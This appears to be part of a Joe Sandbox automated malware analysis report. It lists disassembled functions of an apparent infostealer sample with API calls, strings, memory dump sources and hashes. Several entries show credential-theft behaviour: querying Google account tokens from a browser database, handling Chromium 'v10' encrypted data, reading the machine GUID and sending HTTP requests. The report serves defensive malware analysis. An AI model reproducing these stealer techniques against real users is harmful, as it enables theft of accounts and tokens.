                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocmemsetstrncpywsprintf
                                                                                                                                                                                      • String ID: C$nK5$nK5:\
                                                                                                                                                                                      • API String ID: 3155998020-3949516349
                                                                                                                                                                                      • Opcode ID: c4f83ac31395b7594c975443d85c01768adb6d8b9d9dfd9aedbbc0ecfaf45e00
                                                                                                                                                                                      • Instruction ID: f422364e66fe7ddcbcd5183456f7cc34ce62f604d8812f5579203c17edfe9d10
                                                                                                                                                                                      • Opcode Fuzzy Hash: c4f83ac31395b7594c975443d85c01768adb6d8b9d9dfd9aedbbc0ecfaf45e00
                                                                                                                                                                                      • Instruction Fuzzy Hash: 983178B6C00108AEDB02EBF4CD85CEE7BBCEF44344F1000A5F606AA011EA35AF45CBA0
                                                                                                                                                                                      Function 0034E301 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 166COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00064000,00361ECC), ref: 0034E310
                                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00361ECC), ref: 0034E331
                                                                                                                                                                                      • memset.MSVCRT ref: 0034E373
                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0034E4A5
                                                                                                                                                                                        • Part of subcall function 0034CEAE: strlen.MSVCRT ref: 0034CEC5
                                                                                                                                                                                        • Part of subcall function 0034CA67: memcpy.MSVCRT(?,?,?,?,?,?,?,0034CBEE,00000001,?,?,?,0034CE77,?,00000000,-00000001), ref: 0034CA87
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0034E38B, 0034E46D
                                                                                                                                                                                      • N0ZWFt, xrefs: 0034E412, 0034E41F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: OpenProcessmemcpymemsetstrlen
                                                                                                                                                                                      • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                      • API String ID: 4248304612-1622206642
                                                                                                                                                                                      • Opcode ID: 9f53ad56f5f82096583530d6c5c633a5f7e53314a61b01f69d05be1775087c8f
                                                                                                                                                                                      • Instruction ID: 30b47054892419ea484bc87a34173efe8d55334de6b222188d9642b63a13ecb8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f53ad56f5f82096583530d6c5c633a5f7e53314a61b01f69d05be1775087c8f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2151B071E00209AEDB16EF90CC81EEDBBBCEF04714F144169F515AB291DB746E88DB61
                                                                                                                                                                                      Function 0034D91F Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 310COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,?,?,00361ECC), ref: 0034D95E
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,?,?,00361ECC), ref: 0034D9BD
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0034DC90
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,?,?,00361ECC), ref: 0034DA9D
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000), ref: 0034DB51
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000), ref: 0034DBB1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy
                                                                                                                                                                                      • String ID: Stable\$firefox
                                                                                                                                                                                      • API String ID: 3722407311-3160656979
                                                                                                                                                                                      • Opcode ID: 07aa222e2da21d717e458fe990cbe4ad6f9b61068dc6b628ebe64ffb48780d67
                                                                                                                                                                                      • Instruction ID: e02f75867bf234bc9478fe1eac23c1c1badb78ebb1894b9a718753c81ac5af06
                                                                                                                                                                                      • Opcode Fuzzy Hash: 07aa222e2da21d717e458fe990cbe4ad6f9b61068dc6b628ebe64ffb48780d67
                                                                                                                                                                                      • Instruction Fuzzy Hash: 91A16071900109ABCF26FBB4DC96EEE7BF9BB11354F804515F8019F192EE35AA18C692
                                                                                                                                                                                      Function 0034EF2D Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42registryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • memset.MSVCRT ref: 0034EF53
                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 0034EF6F
                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?), ref: 0034EF8E
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0034EF97
                                                                                                                                                                                      • CharToOemA.USER32(?,?), ref: 0034EFAB
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharCloseOpenQueryValuememset
                                                                                                                                                                                      • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                      • API String ID: 2391366103-1211650757
                                                                                                                                                                                      • Opcode ID: 538fe9c21ab1e6a25b2d13eea47a6aac124adf3f42ddd4eed7b39ce7f2d37fd7
                                                                                                                                                                                      • Instruction ID: 7f80f998f819d42b74572791bc1c1e57462f17338f5a7bb17b1bb963c7e6caab
                                                                                                                                                                                      • Opcode Fuzzy Hash: 538fe9c21ab1e6a25b2d13eea47a6aac124adf3f42ddd4eed7b39ce7f2d37fd7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B014FB684421DBFEB11DB90DC89EEEB77CEB14345F0041A1B545E2061EAB09FC89B60
                                                                                                                                                                                      Function 003480A3 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 262stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00348253
                                                                                                                                                                                        • Part of subcall function 0034F884: LocalAlloc.KERNEL32(00000040,0035158E,ERROR,00361C14,?,0035158D,00000000,00000000), ref: 0034F89D
                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 00348278
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034833A
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034834E
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 00346BB0: memcmp.MSVCRT(?,v10,00000003,0035E264,0035E266,?), ref: 00346BCF
                                                                                                                                                                                        • Part of subcall function 00346BB0: memset.MSVCRT ref: 00346C00
                                                                                                                                                                                        • Part of subcall function 00346BB0: LocalAlloc.KERNEL32(00000040,?), ref: 00346C35
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                      • String ID: AccountId$GoogleAccounts$SELECT service, encrypted_token FROM token_service$f5
                                                                                                                                                                                      • API String ID: 2910778473-512823432
                                                                                                                                                                                      • Opcode ID: bcd8c5af8446a1f160d15d9219dd6e8629c2521463d2b75655e537952cb44e55
                                                                                                                                                                                      • Instruction ID: 1cc6dbaa0683cc6c7e5c17366fd13c1b5f1782277e5464bc20a6514d0998496b
                                                                                                                                                                                      • Opcode Fuzzy Hash: bcd8c5af8446a1f160d15d9219dd6e8629c2521463d2b75655e537952cb44e55
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5091D772804108AADF06FBE4DD96CEE77B8BF25315F550565F402BE0A1EF24BA09CB61
                                                                                                                                                                                      Function 00353E8E Relevance: 10.6, APIs: 7, Instructions: 101stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?,00000104,?,00000104,?,00000104,?,00000104,?), ref: 00353EDE
                                                                                                                                                                                        • Part of subcall function 0034F83B: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 00353F00
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00353F1C
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00353F30
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00353F43
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00353F57
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00353F6A
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034F80B: GetFileAttributesA.KERNEL32(00000000,?,?,0034AF28,?), ref: 0034F818
                                                                                                                                                                                        • Part of subcall function 00353C2D: GetProcessHeap.KERNEL32(00000000,0098967F,00000104), ref: 00353C3E
                                                                                                                                                                                        • Part of subcall function 00353C2D: HeapAlloc.KERNEL32(00000000), ref: 00353C45
                                                                                                                                                                                        • Part of subcall function 00353C2D: wsprintfA.USER32 ref: 00353C5D
                                                                                                                                                                                        • Part of subcall function 00353C2D: FindFirstFileA.KERNEL32(?,?), ref: 00353C74
                                                                                                                                                                                        • Part of subcall function 00353C2D: StrCmpCA.SHLWAPI(?,0035E258), ref: 00353C91
                                                                                                                                                                                        • Part of subcall function 00353C2D: StrCmpCA.SHLWAPI(?,0035E254), ref: 00353CAB
                                                                                                                                                                                        • Part of subcall function 00353C2D: wsprintfA.USER32 ref: 00353CCF
                                                                                                                                                                                        • Part of subcall function 00353C2D: CopyFileA.KERNEL32(?,00000000,00000001), ref: 00353D72
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3853466361-0
                                                                                                                                                                                      • Opcode ID: 1ce574388ccbe2dd181760fab855a78a286530b17cb9d9389d9021687e0d7f08
                                                                                                                                                                                      • Instruction ID: 04e77f0d869ba9d80c07993f8989015026c226c1a260c67b07344f7f1eaa43eb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ce574388ccbe2dd181760fab855a78a286530b17cb9d9389d9021687e0d7f08
                                                                                                                                                                                      • Instruction Fuzzy Hash: EA31A0B2C0011DABCF12EBF0DD49DCE77BCAF49305F0445E2B509EA055EA34A7898BA5
                                                                                                                                                                                      Function 00351509 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 0034502A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0034507A
                                                                                                                                                                                        • Part of subcall function 0034502A: StrCmpCA.SHLWAPI(?), ref: 0034508E
                                                                                                                                                                                        • Part of subcall function 0034502A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003450B1
                                                                                                                                                                                        • Part of subcall function 0034502A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 003450E7
                                                                                                                                                                                        • Part of subcall function 0034502A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0034510B
                                                                                                                                                                                        • Part of subcall function 0034502A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00345116
                                                                                                                                                                                        • Part of subcall function 0034502A: HttpQueryInfoA.WININET(00000000,00000013,?,00000000), ref: 00345134
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00351565
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00351578
                                                                                                                                                                                        • Part of subcall function 0034F884: LocalAlloc.KERNEL32(00000040,0035158E,ERROR,00361C14,?,0035158D,00000000,00000000), ref: 0034F89D
                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 0035159F
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 003515B4
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 003515CF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
